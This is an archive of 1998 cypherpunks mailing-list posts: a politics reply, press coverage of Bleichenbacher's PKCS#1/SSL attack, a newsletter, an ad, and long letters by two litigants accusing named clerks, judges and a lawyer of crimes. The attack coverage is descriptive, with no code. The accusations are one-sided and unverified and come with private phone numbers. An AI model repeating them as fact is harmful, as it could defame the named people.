To: cypherpunks@toad.com
Subject: Re: "deadbeat parents"
In-Reply-To: <199806260405.VAA23457@netcom3.netcom.com>
Message-ID: <199806260522.IAA08459@ankara.192.168.3.5>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Jun 98, Vladimir Z. Nuri was found to have commented thusly:

> apparently one of the 4 horsemen of the infocalypse...?!?!
> whatever can be used as an excuse to take away rights, eh?
> 
> 
[news clip  regarding new Deadbeat Parents federal law excised]

I have a strong feeling that this new law is going to turn around and bite 
the Great Society II (GSII) advocates in their federal ass.  Considering 
some of the minimum limits regarding child support sums in arrears, it 
really won't take any time for prominent members, subscribers, and 
believers in GSII, including Friends of Bill and Friends of Hillary, to 
find themselves on the other side of a federal arrest warrant.  The $5000 
limit could be reached in a matter of a few months, it seems, for quite a 
few of even the "middle-class" child support payers.  (Anyone reading this 
who pays child support willing to divulge how many months it would take 
for them to reach that limit?)  I don't believe that deadbeat parents 
should evade their responsibility, but this law pretty much is the wrong 
way to deal with it.

Prosecutors of any stripe are not going to bother with making a judgment 
regarding 'intent', which they probably don't consider their duty anyway. 
They will have a formulae all worked out in concert with the presiding 
judge--whose duty should be the 'justice' end of any bum rap, deciding the 
issue of 'intent'--to nail anyone who violates the letter (and disregard 
the question of the violation of the spirit) of the law.  The poor will 
necessarily cop a plea and probably do some federal time AND/or find 
themselves assessed federal fines that will essentially make them 
indentured servants to the state for years.  The rich will work a deal to 
stay out of prison since the feds don't want to waste time with the 
delaying tactics of their savvy lawyers.

Perhaps at some point, after thousands of well-meaning but misfortunate 
parents find themselves considered felons in their society because they 
got behind in the support although there was no clear intent to do so, the 
law or certain elements of it will be sensibly repealed or reformed to 
target those whose intent to evade is really indisputable.  There are 
probably as well "minor" provisions and clauses in the law not reported in 
the news clip, but which certainly make life impossible for the well-
meaning to obtain complete rehabilitation;  those parts of the code would 
need attention as well.


Mitch Halloran
Research (Bio)chemist
Duzen Laboratories Group
Ankara   TURKEY
mitch@duzen.com.tr

"Tonight, again, the strong and arrogant opponent
           felt the bitter taste of defeat at your hands"
---Ayatollah Ali Khamenei, addressing the jubilant Iranian soccer team
        whose very unexpected victory over the US eliminated them
        from the France 1998 World Cup




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Steve Orrin" <privsoft@ix.netcom.com>
Date: Fri, 26 Jun 1998 07:27:48 -0700 (PDT)
To: "Cypherpunks Algebra" <cypherpunks@algebra.com>
Subject: RSA and Others work on SSL Fix
Message-ID: <199806261426.JAA08740@dfw-ix14.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


FYI



RSA DATA SECURITY WORKS WITH INTERNET SOFTWARE VENDORS TO RESPON
6/26/98 7:19

 to Potential
                 Security Attack on Secure Web Communications

    SAN MATEO, Calif., June 26 /PRNewswire/ -- RSA Data Security, Inc.
today
announced it is working with a group of leading Internet software vendors
on
pre-emptive countermeasures to thwart a newly-discovered potential attack
against secure Web communications.  This vulnerability is currently the
subject of research and has not been reported by any users.
    These countermeasures enhance the security of popular Internet server
software products based on the Secure Sockets Layer (SSL) protocol.  The
countermeasures are, or will be, available from respective vendors' Web
sites,
and include configuration guidelines, software updates where applicable and
additional information.  Currently available vendor information may be
found
at the following sites:

    * C2Net Software, Inc.
    http://www.c2.net
    * Consensus Development Corporation
    http://www.consensus.com/ssl-rsa.html
    * IBM Corporation
    http://www.ibm.com/security
    * Lotus Development Corporation
    http://www.lotus.com/security
    * Microsoft Corporation
    http://www.microsoft.com/security
    * Netscape Communications Corporation
    http://help.netscape.com/products/server/ssldiscovery/index.html
    * Open Market, Inc.
    http://www.openmarket.com/security
    * RSA Data Security, Inc.
    http://www.rsa.com/rsalabs/

    RSA will also maintain an updated list of all vendors' countermeasure
site
links at its site. In addition, RSA has been working closely with the CERT
Coordination Center on this problem. CERT has made a technical advisory on
this vulnerability available at http://www.cert.org.
    These countermeasures address a potential vulnerability discovered by
cryptographer Daniel Bleichenbacher of the Secure Systems Research
Department
of Bell Labs, the research and development arm of Lucent Technologies.
Bleichenbacher identified a cryptanalytic vulnerability that could
potentially
be used to discover the key for a particular encrypted session through a
process of repeatedly sending on the order of one million carefully
constructed messages to a target server and observing the server's
response.
Due to the large number of messages needed, the potential attack is
detectable
by network administrators.  Additional information is available on the Bell
Labs Web site at http://www.bell-labs.com.
    The vulnerability affects interactive key establishment protocols that
use
the Public Key Cryptography Standard (PKCS) #1, including SSL.  The PKCS
series of standards are defined by RSA Laboratories, reviewed by industry
and
have been adopted by many major vendors of information systems and
incorporated in national and international standards.  The vulnerability
does
not apply to PKCS #1-based secure messaging protocols, such as Secure
Electronic Transactions (SET) and Secure Multipurpose Internet Mail
Extension
(S/MIME) because they are not susceptible to, or already implement
mechanisms
preventing this potential vulnerability.
    A technical overview of the attack and recommended countermeasures for
installed SSL-based server software are available now on the RSA Labs Web
site
at http://www.rsa.com/rsalabs/.
    Software developers interested in testing their products for this
potential vulnerability should visit RSA's site at http://www.rsa.com where
they can find diagnostic instructions and prescriptive information for
updating their applications.   In  July, RSA plans to provide developers
using
the company's BSAFE security suite with free software enhancements designed
to
eliminate this threat.
    RSA Laboratories plans to release for comment a draft PKCS #1 v2 in
July
following a revision process that began early in the year.

    RSA Data Security, Inc.
    RSA Data Security, Inc., a wholly owned subsidiary of Security Dynamics
Technologies, Inc. (Nasdaq: SDTI), is a leading supplier of software
components that secure electronic data, with more than 300 million copies
of
RSA encryption and authentication technologies installed worldwide.  RSA
technologies are part of existing and proposed standards for the Internet
and
World Wide Web, ISO, ITU-T, ANSI, IEEE, and business, financial and
electronic
commerce networks around the globe.  RSA develops and markets platform-
independent security components and related developer kits and provides
comprehensive cryptographic consulting services.  RSA can be reached at
http://www.rsa.com.

    All products and companies mentioned herein may be trademarks or
registered trademarks of their respective holdings and are hereby
recognized.

SOURCE  RSA Data Security, Inc.
    -0-                             06/26/98
    /CONTACT:  Patrick Corman, Corman Communications, 650-326-9648,
patrick@cormancom.com/
    /Web site:  http://www.rsa.com/
    (SDTI)

CO:  RSA Data Security, Inc.
ST:  California
IN:  CPR
SU:



-0- (PRN) Jun/26/98   07:03
EOS   (PRN)    Jun/26/98    07:04      86

-0- (PRN) Jun/26/  98    7:19






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Fri, 26 Jun 1998 10:02:33 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News from WOW-COM - June 26, 1998
Message-ID: <199806261646.LAA26369@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

CALEA Summit being held July 21 & 22 in Washington, DC.
Register Now!!  Call (202) 785-0081
=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 26 Jun 1998 12:37:06 -0700 (PDT)
To: ukcrypto@maillist.ox.ac.uk
Subject: ?
Message-ID: <3593F79B.797B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 6/26/98 1:23 PM

John Young

I wonder what the effect of all of the like

  http://www.jya.com/rsa-pkcs1.htm

and other materials you have posted at http://www.jya.com/crypto.htm
are going to be on those controlling the money?  

Some key congressmen and their advisors.

Crypto, in my mind, represents pseudomathematics at its finest.

Also, the guy that is going to break-in will do it before encryption or 
after decryption. 

http://www.aci.net/kalliste/ricono.htm

Or, of course, TRANSMIT THE KEY WITH THE CYPHERTEXT!

My mind is getting back to finishing the digital FX - and revising
my book!

Morales and I do not know what to make of Mitchell's JUN 22 motion.

But, with us now complaining to the Senate Judiciary Committee, WITH
HARD DOCKET EVIDENCE of wrongdoing life for lawyers is now more
complicated.

I will respond to the JUN 22 motion about next Wednesday.

Won't be hard.  This is an INSIDE JOB.  I KNOW where the documents
are since I know the AUTHORS.  No search is required.

This should be settled before it gets WORSE.

Later
bill

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html


Subject: 
        Judicial Misconduct at Tenth Circuit Court of Appeals
  Date: 
        Mon, 22 Jun 1998 13:29:01 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        art morales <armoral@sandia.gov>, senator_hatch@Hatch.senate.gov, senator@thurmond.senate.gov,
        chuck_grassley@grassley.senate.gov, senator_specter@specter.senate.gov, 
senator_thompson@thompson.senate.gov,
        info@kyl.senate.gov, senator_dewine@dewine.senate.gov, john_ashcroft@ashcroft.senate.gov, 
michigan@abraham.senate.gov,
        senator_leahy@leahy.senate.gov, senator@kennedy.senate.gov, senator@biden.senate.gov, 
senator_kohl@kohl.senate.gov,
        senator@feinstein.senate.gov, russell_feingold@feingold.senate.gov, dick@durbin.senate.gov, 
senator@torricelli.senate.gov
    CC: 
        steve dillingham <" Steven.Dillingham"@hq.doe.gov>, Robert Nordhaus <" 
Robert.Nordhaus"@hq.doe.gov>, mrgall@ix.netcom.com,
        jy@jya.com, art morales <armoral@sandia.gov>, federico pena <" Federico.F.Pena"@hq.doe.gov>, 
RJPARK@sandia.gov,
        cypherpunks@toad.com, ukcrypto@maillist.ox.ac.uk


Monday 6/22/98 1:02 PM

Senate Judiciary Committee
http://www.senate.gov/committee/judiciary.html

Republicans

Orrin G. Hatch, Utah, Chairman   senator_hatch@Hatch.senate.gov
Strom Thurmond, South Carolina   senator@thurmond.senate.gov
Charles E. Grassley, Iowa   chuck_grassley@grassley.senate.gov
Arlen Specter, Pennsylvania   senator_specter@specter.senate.gov
Fred Thompson, Tennessee   senator_thompson@thompson.senate.gov
Jon Kyl, Arizona   info@kyl.senate.gov
Mike DeWine, Ohio   senator_dewine@dewine.senate.gov
John Ashcroft, Missouri   john_ashcroft@ashcroft.senate.gov
Spencer Abraham, Michigan   michigan@abraham.senate.gov
Jeff Sessions, Alabama

Democrats

Patrick J. Leahy, Vermont   senator_leahy@leahy.senate.gov
Edward M. Kennedy, Massachusetts   senator@kennedy.senate.gov
Joseph R.Biden, Jr., Delaware   senator@biden.senate.gov
Herb Kohl, Wisconsin   senator_kohl@kohl.senate.gov
Dianne Feinstein, California   senator@feinstein.senate.gov
Russell D. Feingold, Wisconsin   russell_feingold@feingold.senate.gov
Richard Durbin, Illinois   dick@durbin.senate.gov
Robert Torricelli, New Jersey   senator@torricelli.senate.gov

Purpose of this e-mail is to give written proof of criminal judicial
misconduct by Tenth Circuit Court of Appeals clerks Hoecker, Fisher, and
Judges Moore, Barrett, Weis and help get this matter settled.

Thursday March 30, 1995 I wrote Tenth Circuit clerk Hoecker to request a
copy of the docket sheets for case 94-2205  Payne v. Sandia Corporation,
et al

Hoecker did not answer my letter.

On Tuesday March 5,1996 I  wrote  Judge Lucius D. Bunton to ask his help
to get a copy of the docket sheets.  No response.

On Monday September 23, 1996 Arthur R Morales and I wrote  Henry A.
Politz, Chief Judge U.S. Court of Appeals - Fifth Circuit to ask his
help to get a copy of the docket sheets of my case and Morales' Tenth
Circuit case 95-2204.

Tenth Circuit also refused to send Morales copies of docket sheets for
his case.

Politz is Bunton's boss.  No response.

Friday May 30, 1997 I wrote Antonin Scalia to get this help to get a
copy of the docket sheets.  No response.

5 May 1998 citizen John Young finds docket sheets on

    Source: PACER, U.S. Court of Appeals, 10th Circuit, 1-800-279-9107

and posts them on Internet at http://jya.com/whp-10usca.htm

  Docket as of April 10, 1998 0:05 am
  Proceedings include all events.
  94-2205  Payne v. Sandia Corporation, et al

shows that I filed my Brief of the Appellant on 2/19/95.

2/23/95     [835344] Appellant's brief filed by William H. Payne.
            Original and 7 copies.   c/s: y. Served on 2/19/95  Oral
            argument? pro se. Appellee/Respondent's brief due 3/24/95
            for Thomas P. Wright, for Robert Surran, for Paul A.
            Stokes, for Mary J. Stang, for Tommy A. Sellers, for Craig
            A. Searls, for Albert Narath, for Preston B. Herrington,
            for Peter S. Hamilton, for Roger L. Hagengruber, for James
            R. Gosler, for Harold L. Folley, for Robert L. Ewing, for
            C. William Childers, for Harvey J. Brewster, for Sandia
            Corporation (mbm)

mbm writes "Appellee/Respondent's brief due 3/24/95"

Sandia had sent me a copy of its brief by 3/28/96.

I filed  attached MOTION TO GRANT PLAINTIFF-APPELLANT'S DEMANDS ON BASIS
THAT DEFENDANT-APPELLEES FAILED TO FILE BRIEF WITHIN 30 DAYS SPECIFIED
BY FEDERAL RULE OF APPELLATE PROCEDURE 31 on Tuesday the 28th day of
March, 1995

My February 28 MOTION at the Tenth Circuit is filed WITHOUT notice of
service logged.

4/4/95       [845484] Appellant's motion filed by Appellant William H.
             Payne [94-2205] to grant appellant's demands on basis that
             appellees' failed to file timely brief. Original and 3
             copies  c/s: y (mbm)

In 1995 FRAP 25 (a) stated  "[b]riefs shall be deemed filed on the day
of mailing if the 
most expeditious form of delivery by mail, excepting special delivery,
is used."

FRAP 25 has been changed by 1998 to
http://www.ca5.uscourts.gov/docs/frap-iop.htm#25a

Since I mailed Appellant's motion filed by Appellant William H.  Payne
[94-2205] to grant appellant's demands on basis that appellees' failed
to file timely brief on 3/28/98, it is likely Sandia's lawyer Friedman
received it 3/29/95.

Tenth Circuit logs

3/30/95      [844759] Appellee's brief filed by Sandia Corporation,
             Harvey J. Brewster, C. William Childers, Robert L. Ewing,
             Harold L. Folley, James R. Gosler, Roger L. Hagengruber,
             Peter S. Hamilton, Preston B. Herrington, Albert Narath,
             Craig A. Searls, Tommy A. Sellers, Mary J. Stang, Paul A.
             Stokes, Robert Surran, Thomas P. Wright. Original and 7
             copies. c/s: y. Served on 3/27/95  Oral Argument? y
             (appellant is pro se) Appellant's optional reply brief due
             4/13/95 for William H. Payne (mbm)

Federal Rule of Appellate Procedure [FRAP] 26 (c) states

  (c) Additional Time after Service. When a party is required or
permitted to act within a      prescribed period after service of a
paper upon that party, 3 calendar days are added to the     prescribed
period unless the paper is delivered on the date of service stated in
the proof of   service. 

  http://www.ca5.uscourts.gov/docs/frap-iop.htm#26c

While the Tenth Circuit ASSERTS Appellees' brief was, in fact, served on
3/27/95
evidence given below points to the brief  was served, in fact, on
3/29/95.  

I allege that Friedman affixed a false date of service to Sandia's
brief.

I WAS NEVER PROPERLY SERVED.  I wrote

          Wednesday March 29, 1995

          Dan Friedman
          Simons, Cuddy & Friedman
          Pecos Trail Office Compound
          1701 Old Pecos Trail
          POB 4160
          Santa Fe, NM 87502-4160
          505-988-4476
          505-984-1807 FAX

          Dear Lawyer Friedman:

          Today at 14:00 hours I found a green and white about 9x13
          inch envelope in our mail box at my home.

          Mailing label indicated that the envelope came from your
          firm.  CONFIDENTIAL was stamped on the mailing label.

          I  wrote "Received at 14:00 hours on W 3/29/95 with no
          POSTMARK OR STAMP by W. H. Payne" at the bottom of the
          envelope.

          There was no STAMP OR POSTAGE METER LABEL or 
          POSTMARK on the envelope.

          Therefore, I gave the envelope to US Postal Service
          supervisor Mel at 14:49 hours today at the Postal Receiving
          station at 9904 Montgomery, NW in Albuquerque.  Mel has a
          copy of the cover of the envelope with Mel's note written on
          it.

          Mel told me the post office was going to return the envelope
          to your firm for proper mailing.

          I ask:

         1    What did this envelope contain?  Please identify
              the documents precisely.

         2    If any Certificates of Service were included in the
              envelope, then what were the dates affixed to these
              documents?

         3    Who placed this envelope in our mail box?

         Lawyer Friedman:  It appears you missed an important filing
         date.  And are in the process of attempt to correct your
         failure.  But may be using illegitimate methods to conceal
         your failure.

         Please respond as soon as possible so that we all may
         discover what has happened here." ...

Lawyer Friedman did not respond to the above letter.

But Friedman did mail me Appellees' brief many days later in envelope
showing TRUE MAILING date.  Certificate of service on received
Appellees' brief
did not reflect postmark date.

10th Cir. R. 25.4 in 1995 page 62 reads
  
  Papers not accepted for filing. -- The clerk shall not file papers
that do not comply
  with the Federal Rules of Appellate Procedure and these rules See
10thCir. R. 42.1

But Tenth Circuit clerks Fisher and Hoecker despite my protests and
submission of
evidence may have stamped FILED on Sandia's IMPROPERLY SERVED 
Appellee/Respondent's brief according to the Federal Rules of Appellate
Procedure.

Laywer Friedman FALSIFIED THE CERTIFICATE OF SERVICE.   

Friedman DID NOT MAIL ME "Served on 3/27/95."

d) Proof of Service; Filing. A paper presented for filing shall contain
an acknowledgment of service by the   person served or proof of service
in the form of a statement of the date and manner of service, of the
name of the person served, and of the addresses to which the papers were
mailed or at which they were delivered, certified by the person who made
service. Proof of service may appear on or be affixed to the papers
filed. When a brief or appendix is filed by mailing or dispatch in
accordance with Rule 25(a)(2)(B), the proof of service shall also state
the date and manner by which the document was mailed or dispatched to
the clerk.

  http://www.ca5.uscourts.gov/docs/frap-iop.htm#25a
  
Crime apparently committed by Hoecker and Fisher is

 1017. Government seals wrongfully used and instruments wrongfully
sealed 

Whoever fraudulently or wrongfully affixes or impresses the seal of any
department or agency of the United States, to or upon any certificate,
instrument, commission, document, or paper or with knowledge of its
fraudulent character, with wrongful or fraudulent intent, uses, buys,
procures, sells, or transfers to another any such certificate,
instrument, commission, document, or paper, to which or upon which said
seal has been so fraudulently affixed or impressed, shall be fined under
this title or imprisoned not more than five years, or both. 
http://www.law.cornell.edu/uscode/18/1017.shtml

Despite my protests of judicial misconduct Judges Moore, Barrett, Weis
award decision to Sandia

10/6/95      [890055] Order filed by Judges Moore, Barrett, Weis
             "...All outstanding motions are denied..." (found in Order
             & Judgment of 10/6/95) [879579-1]  Parties served by mail.
             (pdw)

when these judges should not have had Appellees' brief before them.

Then in an apparently attempt to conceal what happened

10/6/95     [890076]  NOTE: THIS ENTIRE CASE IS SEALED. Terminated on
            the Merits after Submission Without Oral Hearing; Judgment
            Affirmed; Written, Signed, Unpublished. Moore, authoring
            judge; Barrett; Weis. [94-2205] (pdw)

I WON MY APPEAL, pro se, ON A TECHNICALITY but judges Judges Moore,
Barrett, Weis
awarded the win to Sandia Labs!

Members of Congress, judicial misconduct in this matter has been
well-documented.  Court records
filed with the Tenth Circuit.  But CURRENTLY under seal.

Lawyers involved in this matter attempt to use the legal strategy of
IGNORE and STONEWALL to
attempt to deny me justice.  

Ignoring and stonewalling by lawyers forced Morales and me to seek
visibility so lawyers
could no longer ignore and stonewall.

Lawyer attitude apparently is that they ignore rules of civil procedure
or even the law so long
as their actions are invisible to public scrutiny.

Visibility was achieved by suing the National Security Agency which
revealed even more judicial misconduct http://www.jya.com/whp052898.htm.

I would like to settle all  matters involved with this unfortunate
cyrpto-related matter,
which includes criminal violations of the Privacy Act.

DOE lawyer Steve Dillingham asked me to prepare a settlement offer in
1994.  I wrote a
settlement letter  May 22, 1994 to Dillingham.  Nothing happened.

June 11, 1998 I made several modifications to my 1994 settlement letter
and sent it e-mail
to Robert Nordhaus, Chief Counsel, DOE.

I ask that you

1  help with settlement of my six-year-old since I won my appeal at the
Tenth Circuit,
2  investigate Tenth Circuit case 94-2205  Payne v. Sandia Corporation,
et al to bring
   the guilty to justice.

Sincerely

william payne

505 292 7037  I am not reading e-mail

http://jya.com/whpfiles.htm
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html

Coauthor Lewis in the above is one of my former MS and PhD students in
computer science.

http://www.friction-free-economy.com/



Monday 6/22/98 1:04 PM

Members of Congress

Purpose of this e-mail is to give written proof of criminal judicial
misconduct by Tenth Circuit Court of Appeals clerks Hoecker, Fisher, and
Judges Anderson, Barrett, Logan and request a congressional
investigation.

After several years, with Payne, of trying to get Tenth Circuit to send
docket sheets from my case,
citizen John Young  http://www.jya.com/index.htm  locates docket sheets
and posts them
    
  Morales Case Dockets 10th USCA                    June 12, 1998

on Internet at http://www.jya.com/arm061298.htm.

  Source: Online records Tenth Circuit Court of Appeals via PACER 

  GENERAL DOCKET FOR
  Tenth Circuit Court of Appeals

  Court of Appeals Docket #: 95-2204                           Filed:
9/29/95
  Nsuit: 3440
  Morales v. Sandia National Lab.
  Appeal from: United States District Court for the District of New
Mexico

I filed

11/9/95     [898274] Appellant's brief filed by Arthur R. Morales.
            Original and 2 copies.   c/s: y. Served on 11/7/95.  Oral
            argument? pro se. Appellee's brief due 12/11/95 for Sandia
            National Lab. (pdw)

Sandia files its FIRST ATTEMPT at

12/11/95   [905033] Appellee's deficient brief filed by Sandia
           National Lab.. Appellee's corrected brief due 12/21/95 for
           Sandia National Lab.  additional copies received 12/11/95.
           (fg)

Tenth Circuit court clerk Patrick Fisher writes Wells on December 11,
1995
concerning Sandia's deficient brief

  [C]orrections, however made, must be accompanied by proof of service
  upon all other parties to the appeal. ...

and issues

12/14/95   [905975] FIRST notice of rules violation for Deborah D.
           Wells for Appellee Sandia National Lab. (sls)

Wells submits

12/21/95    [907974] Appellee's brief filed by Sandia National Lab..
            Original and 7 copies.   c/s: y. Served on 12/20/95  Oral
            Argument? n Appellant's optional reply brief due 1/8/96 for
            Arthur R. Morales (mbm)

but DOES NOT serve me with a copy.

Wells later admits in

2/1/96        [917660] Response filed by Sandia National Lab.
              Appellant/Petitioner motion to clarify   Original and 3
              copies.  c/s: y response Null Relief Code (fg)

Certificate of Service date 30th day of January, 1996,

  [h]ad Appellant simply made a phone call to the Tenth Circuit, he
could
  have established that the Defendant-Appellee's corrected brief was
indeed
  filed on a timely basis, ...

I protested by filing

1/3/96       [909965] Appellant's motion "for the Court to Grant
             Appeal" filed by Appellant Arthur R. Morales [95-2204].
             Original and 3 copies.  c/s: y. (pdw)

1/3/96       [909966] Appellant's motion "for New Trial" filed by
             Appellant Arthur R. Morales [95-2204]. Original and 3
             copies.  c/s: y. (pdw)

1/3/96       [909967] Appellant's motion "to Discipline
             Defendant-Appellee" filed by Appellant Arthur R. Morales
             [95-2204]. Original and 3 copies.  c/s: y. (pdw)

because Sandia did not properly serve me in violation of Fisher's
December
11, 1995 order.

The Tenth Circuit court of appeals should NOT, by its own rules, filed
Appellee's brief filed by Sandia National Lab..  Original and 7
copies.   
c/s: y. Served on 12/20/95

10th Cir. R. 25.4 in 1995 page 62 reads
  
  Papers not accepted for filing. -- The clerk shall not file papers
that do not comply
  with the Federal Rules of Appellate Procedure and these rules See
10thCir. R. 42.1

And is doubtful whether court clerk Fisher had any authority under
appellate procedure
to permit Wells to correct her deficient brief.  

Rather Sandia's  brief did not comply with with Federal Rules of
Appellate Procedure and should have been summarily rejected for filing.

I WON, pro se, my appeal to the Tenth circuit on a technicality but
Judges Anderson, Barrett, Logan
awarded the win to Sandia Labs.

4/2/96        [932848] Order filed by Judges Anderson, Barrett, Logan
              denying parties' motions for general relief(found in Order
              and Judgment of 4/2/96)--"...During the course of this
              appeal, the parties have filed various motions for
              dismissal, summary grant, and sanctions. We find no merit
              to any of these motions, and they are [920851-1] Parties
              served by mail. (pdw)

by accepting and judging on a documents which was not permitted to be
before the court by
its own rules.

Judicial misconduct in my case has been well-documented as it is in
Payne's case.

Payne and I speculate that similar judicial misconduct may have occurred
at the Tenth Circuit.

Sandia lawyer Robert J Park wrote me a settlement letter on Feb 18,
1998.

I filled in the blanks and made minor handwritten chages and returned it
on February 22, 1998.  

But my offer has not yet been accepted.

I ask that you

1  help have my settlement offer accepted,
2  investigate judicial misconduct in case 95-2204 and punish the
guilty.

Some citizens can only express such frustrations with the US court
system with violence.

I seek change by legal reform.

Sincerely

Arthur R Morales
505 345 1381



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 26 Jun 1998 18:14:13 -0700 (PDT)
To: cryptography@c2.net
Subject: Lucent Researcher Cracks PKCS#1, SSL
Message-ID: <3.0.5.32.19980626181343.0098a8e0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.rsa.com/rsalabs/pkcs1/
http://www.zdnet.com/zdnn/stories/zdnn_display/0,3440,332372,00.html



Lucent researcher cracks encryption code

By Margaret Kane, ZDNet

An encryption researcher has discovered a software flaw that could allow 
a hacker to break the software codes used for electronic commerce.

The problem protocols use the Public Key Cryptography Standard #1, 
including the Secure Sockets Layer, or SSL standard. RSA Data Security 
Inc., which defined the standard, said that the vulnerability does not
apply to PKCS #1-based secure messaging protocols, such as Secure 
Electronic Transactions and Secure Multipurpose Internet Mail Extension 
because they are not susceptible to -- and already implement --
mechanisms preventing this potential vulnerability. But at a Web site 
using SSL, a hacker could break the code by sending millions of messages 
to the target server and observing the server's response.

That information could be used to decode an intercepted session, said 
Daniel Bleichenbacher, a researcher at Lucent Technologies Inc.'s 
(Nasdaq:LU) Bell Labs. 

A slew of software companies announced today that they are working on a 
patch for the problem, and will post it on their Web sites. RSA, a 
division of Security Dynamics 
Technologies, (Nasdaq:SDTI) said it is working with IBM (Nasdaq:IBM), 
Microsoft Corp.(Nasdaq:MSFT), Netscape 
Communications Corp. (Nasdaq:NSCP), Open Market Inc. (Nasdaq:OMKT), and 
others on the problem. 

RSA is also working with the CERT Coordination Center on the problem, 
which has posted a technical advisory about the situation. 

Reuters contributed to this story. 


++++++++++++++++++ Extracted From Another web page there m+++++++++++++
http://www.zdnet.com/zdnn/stories/zdnn_display/0,3440,332372,00.html

SSL flaw could expose encrypted data

A researcher at Lucent Technologies Inc.&#039;s Bell Laboratories has discovered a vulnerability in the SSL encryption commonly used in electronic commerce transactions.</B></P>

<P>The flaw, which has been exposed only in a laboratory setting, would allow a hacker to capture encrypted data in a session between a browser and server.</P>

<P>The vulnerability is hardly a fatal flaw in SSL (Secure Sockets Layer). Rather, it&#039;s a hole that a savvy Web site administrator should be able to spot before a hacker can do any damage.



"The good news here is that you still have to be pretty smart to break it," said Julie Ferguson, chief technology officer of ClearCommerce Corp., in Austin, Texas.</P>

<P>The researcher, Daniel Bleichenbacher, who works in the secure systems research department of Bell Labs, in Murray Hill, N.J., found a way for a hacker to derive the session key used in a transaction by feeding off the error messages created by a server.</P>

<P>First, the hacker must prepare roughly 1 million messages to send against the server to capture the information. Bleichenbacher said he created an algorithm that analyzes those messages and derives the session key--which is randomly generated for each transaction by a combination of public and private keys at the Web site and the consumer&#039;s browser. Still, a competent site administrator should notice that his Web site has suddenly received a barrage of bad messages.</P>

<P>"It should be very easy to see that an attack is taking place," Bleichenbacher said. The hacker would also have to capture a session at some point on the line, likely at an Internet service provider, not knowing whether there is information within it that is worth stealing.</P>

<P>Because a session key is randomly generated for each session, it&#039;s possible for a hacker to capture information only about that individual session, said officials at RSA Data Security Inc., which developed SSL in conjunction with Netscape Communications Corp.</P>

The flaw, technically found in the standard called the Public Key Cryptography System #1, does not apply to encryption algorithms themselves but rather to the way packets are placed into encrypted envelopes. PKCS#1 is due to be upgraded next month, and the latest revision will account for the newly found vulnerability, said Scott Schnell, vice president of marketing at RSA, in Redwood City, Calif.

<P> The implications are perhaps most serious for home banking, because a hacker using this flaw could capture a user&#039;s banking information.</P>

<P>Although there are no known real-world attacks taking advantage of this SSL flaw, software vendors promise to have patches that mask the error messages. Netscape, in Mountain View, Calif., already has one available on its Web site for several applications, including Netscape Enterprise Server, Netscape Proxy Server and the company&#039;s messaging servers.</P>

<P>Microsoft Corp. also has created a fix that masks the error messages that a hacker would rely upon. Officials of the Redmond, Wash., company said they have worked with Netscape to ensure that their respective fixes do not create interoperability problems.</P>

<P>Both companies said they have already alerted major customers about the problem and provided them with fixes.</P>



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: listmaster@extensis.com
Date: Fri, 26 Jun 1998 18:29:27 -0700 (PDT)
To: undisclosed-recipients:;
Subject: BeyondPress 4.0 from Extensis
Message-ID: <bulk.26799.19980626155158@ssl.extensis.com>
MIME-Version: 1.0
Content-Type: text/plain


Announcing Extensis BeyondPress 4.0 

The Award-winning Quark-to-HTML XTension from Extensis
http://www.extensis.com/BeyondPress_P 


*  Convert Quark to HTML & DHTML with one click
*  Compatible with QuarkXPress 3.31 & 4.0
*  Receive PhotoAnimator FREE! with each copy of BeyondPress 


Extensis BeyondPress 4.0 is the latest version of our award-winning
XTension that takes your Quark documents to the web - in no time.

BeyondPress preserves the layout of your Quark documents in HTML
tables or DHTML for cutting-edge design. Create animated GIFs with
your FREE copy of Extensis PhotoAnimator (a $99 value).  Then drag
the animated GIFs into your Quark layout and see them displayed
live inside QuarkXPress.  Plus, add hyperlinks, image maps, and more -
right in QuarkXPress.
 

Extensis BeyondPress - It's the best way to take Quark to the Web.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Order BeyondPress 4.0 for only $499.95 AND get Extensis 
PhotoAnimator - FREE! (a $99 value)
To order or receive more information please visit:
http://www.extensis.com/BeyondPress_P 
Or phone: 1-800-796-9798 or (503) 274-2020
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BeyondPress is available immediately for Macintosh users.
BeyondPress for Windows will be available later this Summer.
BeyondPress is 100% compatible with Quark XPress 3.31 & 4.0.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

PS. We have made every effort to ensure this message is being sent
only to people who have expressed interest in Extensis products. 
If we have sent this to you in error, please accept our apologies and
reply with "REMOVE" in the subject line for automatic exclusion from
future communications.  If you know someone who would like to be on
our mailing list have them send an email to listmaster@extensis.com
with "ADD" in the subject line and their email address in the body.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 26 Jun 1998 19:49:29 -0700 (PDT)
To: cryptography@c2.net
